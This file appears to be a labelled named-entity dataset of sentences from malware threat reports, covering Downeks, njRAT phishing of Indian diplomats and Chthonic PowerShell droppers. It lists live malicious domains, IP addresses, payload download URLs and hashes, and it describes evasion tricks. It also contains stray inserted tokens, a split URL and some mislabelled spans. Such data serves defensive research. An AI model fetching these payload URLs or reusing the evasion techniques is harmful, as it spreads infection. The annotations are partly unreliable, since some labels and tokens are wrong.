{"text": "The download is initiated upon receiving json with a \u201c download \u201d command , which includes the URL of the file to be downloaded .", "spans": []}
{"text": "Downeks can also be instructed to execute binaries that already exist on the victim machine .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]}
{"text": "After successful execution , Downeks returns the results to the C2 S-TOOL server .", "spans": [{"start": 29, "end": 36, "label": "Malware"}, {"start": 64, "end": 80, "label": "System"}]}
{"text": "Downeks also has a self-update capability , if instructed by the C2 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 65, "end": 67, "label": "System"}]}
{"text": "Downeks can be instructed with the \u201c img \u201d command to capture the victim screen and transmit it back to the C2 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 31, "end": 50, "label": "System"}, {"start": 108, "end": 110, "label": "System"}]}
{"text": "The parameters \u201c wth \u201d and \u201c qlt \u201d specify \u201c width \u201d and \u201c quality \u201d .", "spans": []}
{"text": "Downeks .NET creates a file in the \u201c Appdata \u201d directory , based on certain properties of the machine .", "spans": [{"start": 0, "end": 12, "label": "Malware"}]}
{"text": "During our analysis , Downeks created a file in \u201c Appdata\\Roaming \u201d containing only \u201c SD{new line} 0 \u201d ( \u201c SD \u201d possibly for \u201c SharpDownloader \u201d ) .", "spans": [{"start": 22, "end": 29, "label": "Malware"}]}
{"text": "Although this file itself is not particularly interesting , the older ( native ) Downeks versions also creates a file in Appdata\\Roaming , with identical data .", "spans": [{"start": 81, "end": 88, "label": "Malware"}, {"start": 121, "end": 136, "label": "System"}]}
{"text": "The filenames across the two variants bear striking similarities .", "spans": []}
{"text": "The .NET variant creates \u201c 1FABFBFF0000065132F71D94 \u201d , while the native version creates \u201c 000206511FABFBFF \u201d .", "spans": [{"start": 4, "end": 8, "label": "System"}, {"start": 27, "end": 51, "label": "Indicator"}, {"start": 91, "end": 107, "label": "Indicator"}]}
{"text": "We observed the string \u201c 1FABFBFF0000065132F71D94 \u201d in memory during debugging of the native variant .", "spans": [{"start": 25, "end": 49, "label": "Indicator"}]}
{"text": "This is a pseudo-unique ID for each machine , based on install date taken from the registry , volume serial number , OS version and service pack , Processor architecture , and computer name .", "spans": []}
{"text": "Downeks enumerates any antivirus products installed on the victim machine and transmits the list to the C2 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 104, "end": 106, "label": "System"}]}
{"text": "It constructs this list using the WMI query : \u201cSELECT displayName FROM AntivirusProduct \u201d .", "spans": [{"start": 34, "end": 37, "label": "System"}]}
{"text": "Downeks achieves host persistence through either the registry \u201c run \u201d key or with a shortcut in the start-up folder .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 53, "end": 73, "label": "System"}, {"start": 84, "end": 115, "label": "System"}]}
{"text": "In another similarity between both variants , Dowenks assesses the victim \u2019s external IP using an HTTP request to .", "spans": [{"start": 46, "end": 53, "label": "Malware"}, {"start": 98, "end": 110, "label": "System"}]}
{"text": "com/raw .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}]}
{"text": "Downeks can be instructed by the C2 to perform a few other commands :", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 33, "end": 35, "label": "System"}]}
{"text": "Check if the computer name and user name , or external IP address , is in a provided list and if so , display a message box with a message as defined by the C2 .", "spans": [{"start": 55, "end": 57, "label": "Indicator"}, {"start": 157, "end": 159, "label": "System"}]}
{"text": "Kill any running process and attempt to delete the associated executable . \u201c Setup \u201d command \u2013 sends various info about the machine with each iteration of the C2 communications loop .", "spans": [{"start": 159, "end": 161, "label": "System"}]}
{"text": "Downeks has static encryption keys hardcoded in the code .", "spans": [{"start": 0, "end": 7, "label": "Malware"}]}
{"text": "Palo Alto Networks customers are protected from Downeks and Quasar used in this attack :", "spans": [{"start": 0, "end": 18, "label": "Organization"}, {"start": 48, "end": 55, "label": "Malware"}, {"start": 60, "end": 66, "label": "Malware"}]}
{"text": "WildFire properly classifies these Downeks and Quasar samples as malicious .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 35, "end": 42, "label": "Malware"}, {"start": 47, "end": 53, "label": "Malware"}]}
{"text": "Traps detects and blocks malicious behavior exhibited by new , unknown Quasar samples .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 71, "end": 77, "label": "Malware"}]}
{"text": "C2 servers associated with this activity are blocked through Threat Prevention DNS signatures .", "spans": [{"start": 0, "end": 2, "label": "System"}, {"start": 3, "end": 10, "label": "System"}, {"start": 79, "end": 82, "label": "Indicator"}]}
{"text": "URI TERROR ATTACK & KASHMIR PROTEST THEMED SPEAR PHISHING emails TARGETING INDIAN EMBASSIES AND INDIAN MINISTRY OF EXTERNAL AFFAIRS - CYSINFO .", "spans": [{"start": 58, "end": 64, "label": "System"}, {"start": 75, "end": 91, "label": "Organization"}, {"start": 96, "end": 131, "label": "Organization"}]}
{"text": "In my previous blog I posted details of a cyber attack targeting Indian government organizations .", "spans": [{"start": 65, "end": 96, "label": "Organization"}]}
{"text": "This blog post describes another attack campaign where attackers used the Uri terror attack and Kashmir protest themed spear phishing email to target officials in the Indian Embassies and Indian Ministry of External Affairs ( MEA ) .", "spans": [{"start": 134, "end": 139, "label": "System"}, {"start": 167, "end": 183, "label": "Organization"}, {"start": 188, "end": 223, "label": "Organization"}, {"start": 226, "end": 229, "label": "Organization"}]}
{"text": "In order to infect the victims , the attackers distributed spear-phishing emails containing malicious word document which dropped a malware capable of spying on infected systems .", "spans": [{"start": 74, "end": 80, "label": "System"}, {"start": 92, "end": 106, "label": "System"}]}
{"text": "The email purported to have been sent from legitimate email ids .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 54, "end": 59, "label": "System"}]}
{"text": "The attackers spoofed the email ids associated with Indian Ministry of Home Affairs to send out email to the victims .", "spans": [{"start": 26, "end": 31, "label": "System"}, {"start": 52, "end": 83, "label": "Organization"}, {"start": 96, "end": 101, "label": "System"}]}
{"text": "Attackers also used the name of the top-ranking official associated with Minister of Home affairs in the signature of the email , this is to make it look like the email was sent by a high-ranking Government official associated with Ministry of Home Affairs ( MHA ) .", "spans": [{"start": 24, "end": 56, "label": "System"}, {"start": 73, "end": 97, "label": "Organization"}, {"start": 122, "end": 127, "label": "System"}, {"start": 163, "end": 168, "label": "System"}, {"start": 232, "end": 256, "label": "Organization"}, {"start": 259, "end": 262, "label": "Organization"}]}
{"text": "In the The first wave of attack , The attackers spoofed an email id that is associated with Indian Ministry of Home Affairs ( MHA ) and an email was sent on September 20th , 2016 ( just 2 days after the Uri terror attack ) to an email id associated with the Indian Embassy in Japan .", "spans": [{"start": 59, "end": 64, "label": "System"}, {"start": 99, "end": 123, "label": "Organization"}, {"start": 126, "end": 129, "label": "Organization"}, {"start": 139, "end": 144, "label": "System"}, {"start": 229, "end": 234, "label": "System"}, {"start": 258, "end": 272, "label": "Organization"}]}
{"text": "The email was made to look like as if an investigation report related to Uri terror attack was shared by the MHA official .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 109, "end": 112, "label": "Organization"}]}
{"text": "On Sept 20th,2016 similar Uri Terror report themed email was also sent to an email id connected with Indian embassy in Thailand .", "spans": [{"start": 51, "end": 56, "label": "System"}, {"start": 77, "end": 82, "label": "System"}, {"start": 101, "end": 115, "label": "Organization"}]}
{"text": "This email was later forwarded on Oct 24th,2016 from a spoofed email id which is associated with Thailand Indian embassy to various email recipients connected to the Indian Ministry of External Affairs as shown in the below screen shot .", "spans": [{"start": 5, "end": 10, "label": "System"}, {"start": 63, "end": 68, "label": "System"}, {"start": 106, "end": 120, "label": "Organization"}, {"start": 132, "end": 137, "label": "System"}, {"start": 166, "end": 201, "label": "Organization"}]}
{"text": "In this case Attackers again spoofed an email id associated with Indian Ministry of Home Affairs and the mail was sent on September 1,2016 to an email id associated Thailand Indian embassy , this email was later forwarded on Oct 24th,2016 from a spoofed email of Thailand Indian embassy to various email recipients connected to the Indian Ministry of External Affairs ( MEA ) .", "spans": [{"start": 40, "end": 45, "label": "System"}, {"start": 65, "end": 96, "label": "Organization"}, {"start": 145, "end": 150, "label": "System"}, {"start": 174, "end": 188, "label": "Organization"}, {"start": 196, "end": 201, "label": "System"}, {"start": 254, "end": 259, "label": "System"}, {"start": 272, "end": 286, "label": "Organization"}, {"start": 298, "end": 303, "label": "System"}, {"start": 332, "end": 367, "label": "Organization"}, {"start": 370, "end": 373, "label": "Organization"}]}
{"text": "This time the email was made to look like an investigation report related to Jammu & Kashmir protest was shared by the Ministry of Home Affairs Official and the forwarded email was made to look like the report was forwarded by an Ambassador in Thailand Indian embassy to the MEA officials .", "spans": [{"start": 14, "end": 19, "label": "System"}, {"start": 119, "end": 143, "label": "Organization"}, {"start": 171, "end": 176, "label": "System"}, {"start": 253, "end": 267, "label": "Organization"}, {"start": 275, "end": 278, "label": "Organization"}]}
{"text": "From the emails ( and the attachments ) it looks like the goal of the attackers was to infect and take control of the systems and also to spy on the actions of the Indian Government post the Jammu & Kashmir protest and Uri Terror attack .", "spans": [{"start": 9, "end": 15, "label": "System"}]}
{"text": "When the victim opens the attached word document it prompts the user to enable macro content and both the documents ( Uri Terror Report.doc and mha-report.doc ) displayed the same content and contained a Show Document button .", "spans": [{"start": 26, "end": 48, "label": "System"}, {"start": 118, "end": 139, "label": "Indicator"}, {"start": 144, "end": 158, "label": "Indicator"}]}
{"text": "In case of both the documents ( Uri Terror Report.doc and mha-report.doc ) the malicious macro code was heavily obfuscated (used obscure variable/function names to make analysis harder ) and did not contain any auto execute functions .", "spans": [{"start": 32, "end": 53, "label": "Indicator"}, {"start": 58, "end": 72, "label": "Indicator"}, {"start": 89, "end": 99, "label": "System"}]}
{"text": "Malicious activity is trigged only on user interaction , attackers normally use this technique to bypass sandbox/automated analysis .", "spans": []}
{"text": "Reverse engineering both the word documents ( Uri Terror Report.doc & mha-report.doc ) exhibited similar behaviour except the minor difference mentioned below .", "spans": [{"start": 46, "end": 67, "label": "Indicator"}, {"start": 70, "end": 84, "label": "Indicator"}]}
{"text": "In case of mha-report.doc the malicious activity triggered only when the show document button was clicked , when this event occurs the macro code calls a subroutine CommandButton1_Click() which in turn calls a malicious obfuscated function ( Bulbaknopka() ) .", "spans": [{"start": 11, "end": 25, "label": "Indicator"}, {"start": 135, "end": 145, "label": "System"}, {"start": 165, "end": 187, "label": "System"}, {"start": 242, "end": 255, "label": "System"}]}
{"text": "In case of Uri Terror Report.doc the malicious activity triggered when the document was either closed or when the show document button was clicked , when any of these event occurs a malicious obfuscated function ( chugnnarabashkoim() ) gets called .", "spans": [{"start": 11, "end": 32, "label": "Indicator"}, {"start": 214, "end": 233, "label": "System"}]}
{"text": "The malicious macro code first decodes a string which contains a reference to the pastebin url .", "spans": [{"start": 4, "end": 24, "label": "System"}]}
{"text": "The macro then decodes a PowerShell script which downloads base64 encoded content from the pastebin url .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 25, "end": 35, "label": "System"}, {"start": 59, "end": 81, "label": "System"}, {"start": 91, "end": 99, "label": "System"}]}
{"text": "The base64 encoded content downloaded from the Pastebin link is then decoded to an executable and dropped on the system .", "spans": [{"start": 4, "end": 26, "label": "System"}, {"start": 47, "end": 55, "label": "System"}]}
{"text": "The technique of hosting malicious code in legitimate sites like Pastebin has advantages and it is highly unlikely to trigger any suspicion in security monitoring and also can bypass reputation based devices .", "spans": [{"start": 65, "end": 73, "label": "System"}]}
{"text": "The dropped file was determined as modified version of njRAT trojan .", "spans": [{"start": 55, "end": 67, "label": "Malware"}]}
{"text": "The dropped file ( officeupdate.exe ) is then executed by the macro code using the PowerShell script . njRAT is a Remote Access Tool ( RAT ) used mostly by the actor groups in the middle east .", "spans": [{"start": 19, "end": 35, "label": "Indicator"}, {"start": 62, "end": 72, "label": "System"}, {"start": 83, "end": 100, "label": "System"}, {"start": 103, "end": 108, "label": "Malware"}, {"start": 114, "end": 132, "label": "System"}, {"start": 135, "end": 138, "label": "Malware"}]}
{"text": "Once infected njRAT communicates to the attacker and allows the attacker to log keystrokes , upload/download files , access victims web camera , audio recording , steal credentials , view victims desktop , open reverse shell etc .", "spans": [{"start": 14, "end": 19, "label": "Malware"}]}
{"text": "The dropped file was analyzed in an isolated environment ( without actually allowing it to connect to the c2 server ) .", "spans": [{"start": 4, "end": 16, "label": "System"}, {"start": 106, "end": 108, "label": "System"}]}
{"text": "Once the dropped file ( officeupdate.exe ) is executed the malware drops additional files ( googleupdate.exe , malib.dll and msccvs.dll ) into the %AllUsersProfile%\\Google directory and then executes the dropped googleupdate.exe Upon execution malware makes a connection to the c2 server on port 5555 and sends the system & operating system information along with some base64 encoded strings to the attacker as shown below .", "spans": [{"start": 24, "end": 40, "label": "Indicator"}, {"start": 55, "end": 66, "label": "Malware"}, {"start": 92, "end": 108, "label": "Indicator"}, {"start": 111, "end": 120, "label": "Indicator"}, {"start": 125, "end": 135, "label": "Indicator"}, {"start": 147, "end": 171, "label": "Organization"}, {"start": 212, "end": 228, "label": "Indicator"}, {"start": 244, "end": 251, "label": "Malware"}, {"start": 278, "end": 280, "label": "System"}]}
{"text": "This section contains the details of the c2 domain ( khanji.ddns.net ) .", "spans": [{"start": 41, "end": 43, "label": "System"}, {"start": 53, "end": 68, "label": "Indicator"}]}
{"text": "Attackers used the DynamicDNS to host the c2 server , this allows the attacker to quickly change the IP address in real time if the malware c2 server infrastructure is unavailable .", "spans": [{"start": 19, "end": 29, "label": "System"}, {"start": 42, "end": 44, "label": "System"}, {"start": 101, "end": 103, "label": "Indicator"}, {"start": 140, "end": 142, "label": "System"}]}
{"text": "The c2 domain was associated with multiple IP addresses in past .", "spans": [{"start": 4, "end": 6, "label": "System"}, {"start": 43, "end": 45, "label": "Indicator"}]}
{"text": "During the timeline of this cyber attack most of these IP addresses were located in Pakistan and few IP addresses used the hosting provider infrastructure .", "spans": [{"start": 55, "end": 57, "label": "Indicator"}, {"start": 101, "end": 103, "label": "Indicator"}, {"start": 123, "end": 154, "label": "System"}]}
{"text": "The c2 domain ( khanji.ddns.net ) was also found to be associated with multiple malware samples in the past , Some of these malware samples made connection to pastebin urls upon execution , which is similar to the behavior mentioned previously .", "spans": [{"start": 4, "end": 6, "label": "System"}, {"start": 16, "end": 31, "label": "Indicator"}, {"start": 159, "end": 167, "label": "System"}]}
{"text": "Based on the base64 encoded content posted in the Pastebin , userid associated with the Pastebin post was determined .", "spans": [{"start": 13, "end": 35, "label": "System"}, {"start": 50, "end": 58, "label": "System"}, {"start": 88, "end": 96, "label": "System"}]}
{"text": "The same user posted multiple similar posts most of them containing similar base64 encoded content ( probably used by the malwares in other campaigns to decode and drop malware executable ) , these posts were made between July 21st , 2016 to September 30 , 2016 .", "spans": [{"start": 76, "end": 98, "label": "System"}]}
{"text": "Below screen shot shows the posts made by the user , the hits column in the below screen shot gives an idea of number of times the links were visited ( probably by the malicious macro code ) , this can give rough idea of the number of users who are probably infected as a result of opening the malicious document .", "spans": [{"start": 168, "end": 188, "label": "System"}]}
{"text": "Doing a Google search for the Pastebin userid landed me on a YouTube video posted by an individual demonstrating his modified version of njRAT control panel/builder kit .", "spans": [{"start": 8, "end": 14, "label": "Organization"}, {"start": 30, "end": 38, "label": "System"}, {"start": 61, "end": 68, "label": "Organization"}, {"start": 137, "end": 168, "label": "System"}]}
{"text": "The Pastebin userid matched with the email ID mentioned by this individual in the YouTube video description section .", "spans": [{"start": 4, "end": 12, "label": "System"}, {"start": 37, "end": 42, "label": "System"}, {"start": 82, "end": 89, "label": "Organization"}]}
{"text": "This same keyword was also found in the njRAT c2 communication used in this attack .", "spans": [{"start": 40, "end": 45, "label": "Malware"}, {"start": 46, "end": 48, "label": "System"}]}
{"text": "After inspecting the njRAT builder kit it was determined that this individual customized the existing njRAT builder kit to bypass security products .", "spans": [{"start": 21, "end": 38, "label": "System"}, {"start": 102, "end": 119, "label": "System"}]}
{"text": "The product information in the builder kit matched with this individual \u2019s YouTube username and the YouTube channel .", "spans": [{"start": 75, "end": 82, "label": "Organization"}, {"start": 100, "end": 107, "label": "Organization"}]}
{"text": "The njRAT used in this cyber attack was built from this builder kit .", "spans": [{"start": 4, "end": 9, "label": "Malware"}]}
{"text": "Based on this information it can be concluded that espionage actors used this individual \u2019s modified version of njRAT in this cyber attack .", "spans": [{"start": 112, "end": 117, "label": "Malware"}]}
{"text": "Even though this individual \u2019s email id matched with the Pastebin id where base64 encoded malicious code was found , it is hard to say if this individual was or was not involved in this cyber attack .", "spans": [{"start": 31, "end": 36, "label": "System"}, {"start": 57, "end": 65, "label": "System"}]}
{"text": "It could be possible that the espionage actors used his public identity as a diversion to mislead and to hide the real identity of the attackers or it is also possible that this individual was hired to carry out the attack .", "spans": []}
{"text": "The indicators are provided below , these indicators can be used by the organizations ( Government , Public and Private organizations ) to detect and investigate this attack campaign . 14b9d54f07f3facf1240c5ba89aa2410 ( googleupdate.exe ) . 2b0bd7e43c1f98f9db804011a54c11d6 ( malib.dll ) . feec4b571756e8c015c884cb5441166b ( msccvs.dll ) . 84d9d0524e14d9ab5f88bbce6d2d2582 ( officeupdate.exe ) . khanji.ddns.net 139.190.6.180 39.40.141.25 175.110.165.110 39.40.44.245 39.40.67.219 . http://pastebin.com/raw/5j4hc8gT http://pastebin.com/raw/6bwniBtB . 028caf3b1f5174ae092ecf435c1fccc2 7732d5349a0cfa1c3e4bcfa0c06949e4 9909f8558209449348a817f297429a48 63698ddbdff5be7d5a7ba7f31d0d592c 7c4e60685203b229a41ae65eba1a0e10 e2112439121f8ba9164668f54ca1c6af .", "spans": [{"start": 185, "end": 217, "label": "Indicator"}, {"start": 220, "end": 236, "label": "Indicator"}, {"start": 241, "end": 273, "label": "Indicator"}, {"start": 276, "end": 285, "label": "Indicator"}, {"start": 290, "end": 322, "label": "Indicator"}, {"start": 325, "end": 335, "label": "Indicator"}, {"start": 340, "end": 372, "label": "Indicator"}, {"start": 375, "end": 391, "label": "Indicator"}, {"start": 396, "end": 411, "label": "Indicator"}, {"start": 412, "end": 425, "label": "Indicator"}, {"start": 426, "end": 438, "label": "Indicator"}, {"start": 439, "end": 454, "label": "Indicator"}, {"start": 455, "end": 467, "label": "Indicator"}, {"start": 468, "end": 480, "label": "Indicator"}, {"start": 483, "end": 515, "label": "Indicator"}, {"start": 516, "end": 548, "label": "Indicator"}, {"start": 551, "end": 583, "label": "Indicator"}, {"start": 584, "end": 616, "label": "Indicator"}, {"start": 617, "end": 649, "label": "Indicator"}, {"start": 650, "end": 682, "label": "Indicator"}, {"start": 683, "end": 715, "label": "Indicator"}, {"start": 716, "end": 748, "label": "Indicator"}]}
{"text": "Attackers in this case made every attempt to launch a clever attack campaign by spoofing legitimate email ids and using an email theme relevant to the targets .", "spans": [{"start": 100, "end": 105, "label": "System"}, {"start": 123, "end": 128, "label": "System"}]}
{"text": "The following factors in this cyber attack suggests the possible involvement of Pakistan state sponsored cyber espionage group to mainly spy on India \u2019s actions related to these Geo-political events ( Uri terror attack and Jammu & Kashmir protests ) .", "spans": []}
{"text": "Victims/targets chosen ( Indian Embassy and Indian MEA officals ) .", "spans": [{"start": 25, "end": 39, "label": "Organization"}, {"start": 44, "end": 54, "label": "Organization"}]}
{"text": "Use of email theme related to the Geo-political events that is of interest to the targets .", "spans": [{"start": 7, "end": 12, "label": "System"}]}
{"text": "Timing of the spear phishing emails sent to the victims .", "spans": [{"start": 29, "end": 35, "label": "System"}]}
{"text": "Location of the c2 infrastructure .", "spans": [{"start": 16, "end": 18, "label": "System"}]}
{"text": "Use of malware that is capable of spying on infected systems .", "spans": []}
{"text": "The following factors show the level of sophistication and reveals the attackers intention to remain stealthy and to gain long-term access by evading anti-virus , sandbox and security monitoring at both the desktop and network levels .", "spans": []}
{"text": "Use of obfuscated malicious macro code .", "spans": [{"start": 18, "end": 38, "label": "System"}]}
{"text": "Use of macro code that triggers only on user intervention ( to bypass sandbox analysis ) .", "spans": [{"start": 7, "end": 17, "label": "System"}]}
{"text": "Use of legitimate site ( Pastebin ) to host malicious code ( to bypass security monitoring ) .", "spans": [{"start": 25, "end": 33, "label": "System"}]}
{"text": "Use of customized njRAT ( capable of evading anti-virus ) .", "spans": [{"start": 18, "end": 23, "label": "Malware"}]}
{"text": "The Curious Case of Notepad and Chthonic : Exposing a Malicious Infrastructure .", "spans": [{"start": 20, "end": 27, "label": "System"}, {"start": 32, "end": 40, "label": "Malware"}]}
{"text": "Recently , I \u2019ve been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear .", "spans": [{"start": 54, "end": 64, "label": "System"}]}
{"text": "This posting is a follow-up of my previous work on this subject in", "spans": []}
{"text": "\u201c Pulling Back the Curtains on EncodedCommand PowerShell Attacks \u201d .", "spans": [{"start": 46, "end": 56, "label": "System"}]}
{"text": "In a sample I recently analyzed , something stood out as extremely suspicious which led me down a rabbit hole , uncovering malicious infrastructure supporting Chthonic , Nymaim , and other malware and malicious websites .", "spans": [{"start": 159, "end": 167, "label": "Malware"}, {"start": 170, "end": 176, "label": "Malware"}]}
{"text": "Throughout this blog post I present my analysis and thought process during this research , but if you would just like a list of the findings , they are over on our Unit42 GitHub .", "spans": [{"start": 164, "end": 170, "label": "Organization"}, {"start": 171, "end": 177, "label": "System"}]}
{"text": "Most commonly , PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious \u2013 typically downloading the \u201c real \u201d malware to run .", "spans": [{"start": 16, "end": 26, "label": "System"}, {"start": 46, "end": 71, "label": "System"}, {"start": 84, "end": 93, "label": "System"}, {"start": 104, "end": 114, "label": "System"}]}
{"text": "I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it \u2019s worth digging into further based on \u201c uniqueness \u201d and functionality .", "spans": [{"start": 28, "end": 38, "label": "System"}]}
{"text": "In this case , the first sample I looked at stood out for another reason entirely .", "spans": []}
{"text": "If you take a look at the below PowerShell , you \u2019ll quickly understand why .", "spans": [{"start": 32, "end": 42, "label": "System"}]}
{"text": "Most commonly , PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious \u2013 typically downloading the \u201c real \u201d malware to run .", "spans": [{"start": 16, "end": 26, "label": "System"}, {"start": 46, "end": 71, "label": "System"}, {"start": 84, "end": 93, "label": "System"}, {"start": 104, "end": 114, "label": "System"}]}
{"text": "I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it \u2019s worth digging into further based on \u201c uniqueness \u201d and functionality .", "spans": [{"start": 28, "end": 38, "label": "System"}]}
{"text": "My initial thought was the worst-case scenario \u2013 they \u2019ve been compromised and are distributing malware ! I immediately downloaded the file from the website , but everything looked normal .", "spans": []}
{"text": "Of course , I had to investigate further .", "spans": []}
{"text": "Looking under the hood we see the VBA code that builds the PowerShell B-FILE S-TOOL command and launches it but something seemed off .", "spans": [{"start": 34, "end": 37, "label": "System"}]}
{"text": "There are a ton of functions that are clearly decoding information from arrays after which it executes an already decoded PowerShell command .", "spans": [{"start": 122, "end": 132, "label": "System"}]}
{"text": "I decided to debug the macro and see exactly what it \u2019s doing before I made any decisions .", "spans": []}
{"text": "The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file , modified it to see the content ( misspelling the variable name along the way ) post-decoding , and uploaded it to see what it did in a sandbox .", "spans": []}
{"text": "To be sure though , I needed to find other samples and see how they stacked up against this one .", "spans": []}
{"text": "Going back to the PowerShell command , the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output .", "spans": [{"start": 18, "end": 28, "label": "System"}]}
{"text": "This also provides a perfect pivot point to hunt for samples .", "spans": [{"start": 29, "end": 40, "label": "System"}]}
{"text": "The dates were all fairly recent , having been received in the past few days since the beginning of August .", "spans": []}
{"text": "The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected .", "spans": [{"start": 55, "end": 64, "label": "System"}, {"start": 79, "end": 89, "label": "System"}]}
{"text": "For sample \u201c 538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87 \u201d the following is an excerpt from the VBA macro building the PowerShell command .", "spans": [{"start": 13, "end": 77, "label": "Indicator"}, {"start": 117, "end": 126, "label": "System"}, {"start": 140, "end": 150, "label": "System"}]}
{"text": "Along with the subsequent Process Activity using the newly built PowerShell command , which aligns with what was commented out of the first sample analyzed .", "spans": [{"start": 65, "end": 75, "label": "System"}]}
{"text": "Given this , I iterated over all 171 samples and extracted the following URL \u2019s where PowerShell is downloading a payload :", "spans": [{"start": 86, "end": 96, "label": "System"}]}
{"text": "http://ditetec.com S-DOM/ts.exe http://ditetec.com S-DOM/u2.exe http://domass.com.ua S-DOM/index.gif http://firop.com S-DOM/ego.exe http://unoset.com S-DOM/jpx.exe http://unoset.com S-DOM/sxr.exe https://doci.download S-DOM/inc.exe https://farhenzel.co S-DOM/gls.exe https://farsonka.co S-DOM/trb.exe https://formsonat.co S-DOM/mrb.exe https://fortuma.co S-DOM/scu.exe https://iilliiill.bid S-DOM/6ven.exe https://iilliiill.bid S-DOM/ven.exe https://iilliiill.bid S-DOM/ven.tvv https://lom.party S-DOM/mov.exe https://naiillad.date S-DOM/ex3.exe https://naiillad.date S-DOM/u3.exe https://naiillad.date S-DOM/vmer.exe https://naiillad.date S-DOM/vsync.exe https://notepad-plus-plus.org/repository S-DOM/7.x/7.4.2/npp.7.4.2.Installer.exe https://prof.cricket S-DOM/wp.exe https://tvavi.win S-DOM/pago.exe .", "spans": [{"start": 0, "end": 31, "label": "Indicator"}, {"start": 32, "end": 63, "label": "Indicator"}, {"start": 64, "end": 100, "label": "Indicator"}, {"start": 101, "end": 131, "label": "Indicator"}, {"start": 132, "end": 163, "label": "Indicator"}, {"start": 164, "end": 195, "label": "Indicator"}, {"start": 196, "end": 231, "label": "Indicator"}, {"start": 232, "end": 266, "label": "Indicator"}, {"start": 267, "end": 300, "label": "Indicator"}, {"start": 301, "end": 335, "label": "Indicator"}, {"start": 336, "end": 368, "label": "Indicator"}, {"start": 369, "end": 405, "label": "Indicator"}, {"start": 406, "end": 441, "label": "Indicator"}, {"start": 442, "end": 477, "label": "Indicator"}, {"start": 478, "end": 509, "label": "Indicator"}, {"start": 510, "end": 545, "label": "Indicator"}, {"start": 546, "end": 580, "label": "Indicator"}, {"start": 581, "end": 617, "label": "Indicator"}, {"start": 618, "end": 655, "label": "Indicator"}, {"start": 656, "end": 736, "label": "Indicator"}, {"start": 737, "end": 770, "label": "Indicator"}, {"start": 771, "end": 803, "label": "Indicator"}]}
{"text": "After iterating over the 171 samples , we \u2019re left with this list of hashes for the downloaded files .", "spans": []}
{"text": "Note that there are fewer payloads than there are samples , indicating many of the documents download the same payload .", "spans": []}
{"text": "Below is a table with the compile date and some PDB strings found within a few of the binaries .", "spans": []}
{"text": "Most of the compile times are within the past two months , with 6 in August and a couple from as recently as two days ago at the time of this writing . 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad 2016-12-10 01 . d5e56b9b5f52293b209a60c2ccd0ade6c883f9d3ec09571a336a3a4d4c79134b 2016-12-10 03 C:\\RAMDrive\\Charles\\heaven\\reams\\Teac.pdb . dd5f237153856d19cf20e80ff8238ca42047113c44fae27b5c3ad00be2755eea 2016-12-10 16 C:\\Cleaner\\amuse\\rang\\AutoPopulate\\la.pdb . a5001e9b29078f532b1a094c8c16226d20c03922e37a4fca2e9172350bc160a0 2016-12-20 18 . 8284ec768a06b606044defe2c2da708ca6b3b51f8e58cb66f61bfca56157bc88 2017-07-05 10 . f0ce51eb0e6c33fdb8e1ccb36b9f42139c1dfc58d243195aedc869c7551a5f89 2017-07-09 20 C:\\TableAdapter\\encyclopedia\\Parik.pdb . 145d47f4c79206c6c9f74b0ab76c33ad0fd40ac6724b4fac6f06afec47b307c6 2017-07-10 08 C:\\ayakhnin\\reprductive\\distortedc.pdb . dc8f34829d5fede991b478cf9117fb18c32d639573a827227b2fc50f0b475085 2017-07-11 01 C:\\positioning\\scrapping\\Szets\\thi.pdb . 7fe1069c118611113b4e34685e7ee58cb469bda4aa66a22db10842c95f332c77 2017-07-11 02 C:\\NeXT\\volatile\\legacyExchangeDNs.pdb . 5edf117e7f8cd176b1efd0b5fd40c6cd530699e7a280c5c7113d06e9c21d6976 2017-07-12 23 . 2a80fdda87127bdc56fd35c3e04eb64a01a159b7b574177e2e346439c97b770a 2017-07-13 00. a9021e253ae52122cbcc2284b88270ceda8ad9647515d6cca96db264a76583f5 2017-07-18 00 . dd639d76ff6f33bbfaf3bd398056cf4e95e27822bd9476340c7703f5b38e0183 2017-07-18 00 . e5a00b49d4ab3e5a3a8f60278b9295f3d252e3e04dadec2624bb4dcb2eb0fada 2017-07-24 17 . 6263730ef54fbed0c2d3a7c6106b6e8b12a6b2855a03e7caa8fb184ed1eabeb2 2017-07-24 22 C:\\Snapshot\\Diskette\\hiding\\ROCKMA.pdb . 43bfaf9a2a4d46695bb313a32d88586c510d040844f29852c755845a5a09d9df 2017-07-25 06 . b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628 2017-07-25 06 C:\\mdb\\Changed\\Container\\praise.pdb . 9acdad02ca8ded6043ab52b4a7fb2baac3a08c9f978ce9da2eb51c816a9e7a2e 2017-07-25 07 . 2ddaa30ba3c3e625e21eb7ce7b93671ad53326ef8b6e2bc20bc0d2de72a3929d 2017-07-25 20 C:\\helpers\\better\\Expr\\Eight\\DS.pdb . b836576877b2fcb3cacec370e5e6a029431f59d5070da89d94200619641ca0c4 2017-07-26 12 C:\\V\\regard\\violates\\update\\AMBW\\a.pdb . 0972fc9602b00595e1022d9cfe7e9c9530d4e9adb5786fea830324b3f7ff4448 2017-07-26 20 . 2c258ac862d5e31d8921b64cfa7e5a9cd95cca5643c9d51db4c2fcbe75fa957a 2017-07-27 01 C:\\executablery\\constructed\\IIc.pdb 